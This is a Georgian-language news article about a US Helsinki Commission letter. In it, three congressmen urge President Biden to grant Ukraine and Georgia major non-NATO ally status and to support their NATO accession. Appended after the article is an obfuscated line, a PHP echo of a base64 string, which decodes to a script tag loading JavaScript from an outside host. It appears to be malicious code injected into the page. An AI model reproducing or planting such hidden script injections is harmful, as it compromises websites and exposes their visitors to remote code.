celsiusi
ავერსი საქკაბელი
 
აშშ-ის ჰელსინკის კომისია პრეზიდენტ ჯო ბაიდენს მოუწოდებს, მიანიჭოს უკრაინას და საქართველოს ნატო-ს არაწევრი მთავარი მოკავშირის (MNNA) სტატუსი. შესაბამის წერილს გამოცემა Foreign Policy ავრცელებს. მას კონგრესმენები სტივ კოენი, ჯო უილსონი და რიჩარდ ჰადსონი აწერენ ხელს.
 
ამერიკელი კანონმდებლები ასევე მოუწოდებენ აშშ-ის ადმინისტრაციას, გააძლიეროს ამ ქვეყნების ნატო-ში გაწევრიანების მხარდაჭერა.
 
„თქვენი ადმინისტრაციის რეაგირებაა უკრაინის დახმარება, დაიცვას საკუთარი თავი, თუმცა ჩვენ მოგიწოდებთ დაუყოვნებლივი ნაბიჯების გადადგმისკენ უკრაინასთან ჩვენი სამხედრო სავაჭრო ურთიერთობების გასაძლიერებლად მისთვის ნატო-ს არაწევრი მთავარი მოკავშირის სტატუსის მინიჭებით. საქართველოს, რომელსაც არ აქვს საკმარისი უსაფრთხოების გარანტიები დასავლეთისგან და რუსული ოკუპაციისა და საფრთხეების წინაშე დგას, ასევე უნდა მიენიჭოს ნატო-ს არაწევრი მთავარი მოკავშირის სტატუსი. ამ სტატუსის მინიჭება თავდაცვის სფეროში ჩვენი ამჟამინდელი თანამშრომლობის ჭეშმარიტი გამოხატულებაა და ასევე არ ავალდებულებს აშშ-ს სამხედრო მოქმედებებს”- ნათქვამია წერილში.
 
კონგრესმენები აშშ-ის პრეზიდენტს უკრაინასა და საქართველოს ნატოში გასაწევრიანებლად უფრო ქმედითი ნაბიჯების გადადგმისკენ მოუწოდებენ.
 
კონგრესმენების მოსაზრებით, ამ საკითხში აშშ-ის არასაკმარისი მხარდაჭერა პუტინს თავისი ნეოკოლონიალური მიზნების განხორციელების საშუალებას მისცემს.
 
„აშშ-მა უფრო აქტიური პოზიცია უნდა დაიკავოს საქართველოსა და უკრაინის ნატო-ში გაწევრიანების საკითხზე. მიუხედავად იმისა, რომ აშშ მუდმივად მხარს უჭერს საქართველოსა და უკრაინის გაწევრიანებას ნატო-ში, რუსეთის ოკუპაციამ და მიმდინარე აგრესიამ გამოააშკარავა ევრო-ატლანტიკური სივრცის გაფართოების ხანგრძლივად შეჩერებული პროცესის ტრაგედია. საქართველოსა და უკრაინის ნატო-ში გაწევრიანების საკითხზე აშშ-ის ძლიერი და პროაქტიული მხარდაჭერის გარეშე, პუტინი გააგრძელებს თავისი უპირატესობის გამოყენებას საკუთარი მიზნების შესასრულებლად – თავდაყირა დააყენოს ევროპის უსაფრთხოება და თანამშრომლობა და სისრულეში მოიყვანოს თავისი ნეოკოლონიალური დღის წესრიგი”,- ნათქვამია კონგრესმენების წერილში, რომელიც უკრაინაში მიმდინარე რუსეთის სამხედრო აგრესიას ეხება.
 
 
772
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");